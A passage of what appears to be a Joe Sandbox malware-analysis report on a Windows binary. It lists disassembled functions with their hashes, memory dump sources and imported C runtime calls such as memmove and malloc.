                                                                                          • Opcode Fuzzy Hash: 9ed46b6f8f75cd7a11fab145833413d8715b3bb7ca78f2fa700ff5e348dbe209
                                                                                          • Instruction Fuzzy Hash: 4B51D1B2B14BCA82EE04DF15D5551A9ABE0FB48BD8B94C536DE8D07785DF3CE2928310
                                                                                          Function 00007FF7CC419520 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 345ed9141544bd9e532acaeea0028dac4bd11417d57088c0308dd1692226be08
                                                                                          • Instruction ID: d035d4f1c63f788b9055424e17a1a119df68685f9dd828eff9c3ee27d64c41c2
                                                                                          • Opcode Fuzzy Hash: 345ed9141544bd9e532acaeea0028dac4bd11417d57088c0308dd1692226be08
                                                                                          • Instruction Fuzzy Hash: 29516332708BC185DB109F29E45036DB7A5FB94BA8FA48136DA9D437A8DF3CC544C720
                                                                                          Function 00007FF7CC4236F0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,?,00007FF7CC4236C9), ref: 00007FF7CC4237D3
                                                                                          • memmove.VCRUNTIME140(?,?,?,00007FF7CC4236C9), ref: 00007FF7CC4237E6
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7CC4236C9), ref: 00007FF7CC42384C
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC423859
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2075926362-0
                                                                                          • Opcode ID: a86a7b23bfeba5573993a89bc7aba90ef1bb14d9438def8be3e155517315a166
                                                                                          • Instruction ID: b4e2cdd88a104b1c72d3eb8df832363d55f4708558c23bc7f18ed6d2eefe4d3b
                                                                                          • Opcode Fuzzy Hash: a86a7b23bfeba5573993a89bc7aba90ef1bb14d9438def8be3e155517315a166
                                                                                          • Instruction Fuzzy Hash: 94410662B186C581ED18EF22A4052B9EBA6EB44BE4F94C531DFAD077D1DE3CE240C310
                                                                                          Function 00007FF7CC422620 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,00000000,?,?,00007FF7CC420D50), ref: 00007FF7CC4226FB
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,00007FF7CC420D50), ref: 00007FF7CC42272F
                                                                                          • memmove.VCRUNTIME140(?,?,00000000,?,?,00007FF7CC420D50), ref: 00007FF7CC422739
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC422762
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2016347663-0
                                                                                          • Opcode ID: 51e94e837f139ba4fb20f345a1ccfa856b659d0bdc991d05d1abc1dd251b8796
                                                                                          • Instruction ID: bdf9ea1607384af8e9fe226dd6efb3f8354bf5ecfdff9814607921b7928bd780
                                                                                          • Opcode Fuzzy Hash: 51e94e837f139ba4fb20f345a1ccfa856b659d0bdc991d05d1abc1dd251b8796
                                                                                          • Instruction Fuzzy Hash: FE31B662B0978281EE20BF11A5052BDE751EB44BF8F948631DEAD0B7D5DE7CE2518210
                                                                                          Function 00007FF7CC41C8B0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C8F3
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C9B9
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41C9DD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task
                                                                                          • String ID:
                                                                                          • API String ID: 1247048853-0
                                                                                          • Opcode ID: f60c0cf23d42a37fed5d5eb23c0eb88466e8745d2e41552ff856465a0679f37e
                                                                                          • Instruction ID: ebb048459b13705205ab340b4a87dc5e3aa391cad4c102e5c2b58b63929ad4ae
                                                                                          • Opcode Fuzzy Hash: f60c0cf23d42a37fed5d5eb23c0eb88466e8745d2e41552ff856465a0679f37e
                                                                                          • Instruction Fuzzy Hash: C931FB22F197C181ED146F11A84027CAA54AF057F8FA45730DEBE277D5CE3CD2918310
                                                                                          Function 00007FF7CC41CC00 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2016347663-0
                                                                                          • Opcode ID: ee8164bd7e66897d48db60d823e807269d4d271f0d040edfb91ad05a0c1e2cc3
                                                                                          • Instruction ID: 1e2653ae14686452b6b28f760e515f3d6430c29021112241ba80bcf173e7b42e
                                                                                          • Opcode Fuzzy Hash: ee8164bd7e66897d48db60d823e807269d4d271f0d040edfb91ad05a0c1e2cc3
                                                                                          • Instruction Fuzzy Hash: 0A310562B097D190EE10AF15A9043A9EA91AB04BE8FA48635DEAD077C5DF7CE250C310
                                                                                          Function 00007FF7CC41D270 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41D342
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • memmove.VCRUNTIME140 ref: 00007FF7CC41D373
                                                                                          • memmove.VCRUNTIME140 ref: 00007FF7CC41D383
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41D3A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2075926362-0
                                                                                          • Opcode ID: 40b7fbff180d36dde21ad2ac87eba0bf8e1f86231773ecc8bef76c468d774d32
                                                                                          • Instruction ID: c536b08de99750a40a0a7333f333e5e67dd759ec774e58188eea8c02c60b6103
                                                                                          • Opcode Fuzzy Hash: 40b7fbff180d36dde21ad2ac87eba0bf8e1f86231773ecc8bef76c468d774d32
                                                                                          • Instruction Fuzzy Hash: BB31A572B096C590EE15EF12A4402B9A651AB487B8FA88731DEBD477D4DF3CE141C310
                                                                                          Function 00007FF7CC41C9F0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task
                                                                                          • String ID:
                                                                                          • API String ID: 1247048853-0
                                                                                          • Opcode ID: 8e87b847a132ab772c9480015ade71e07ab790f0e7563624fded1b89f271434d
                                                                                          • Instruction ID: 848c93048f74b32c72d514071b850de6669c8f334b062108e02a8bcc295d4585
                                                                                          • Opcode Fuzzy Hash: 8e87b847a132ab772c9480015ade71e07ab790f0e7563624fded1b89f271434d
                                                                                          • Instruction Fuzzy Hash: D0212C22F097D644ED16EF11A900378AA809F04BF8FA48730DEAD17BC1DE3CA6818310
                                                                                          Function 00007FF7CC423A94 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 203985260-0
                                                                                          • Opcode ID: c79e89838950335e68161c302d24957cb7b53d237c1007f095858aba05deba80
                                                                                          • Instruction ID: 072d48462c4076629b97fb8d96ab6f1138fe54547fe9eae5fa77d7eafd03d498
                                                                                          • Opcode Fuzzy Hash: c79e89838950335e68161c302d24957cb7b53d237c1007f095858aba05deba80
                                                                                          • Instruction Fuzzy Hash: CA215B72A18B9187E3209F11E40532EFEB4F789BA8F644138DB8953B59CF3CD9458B00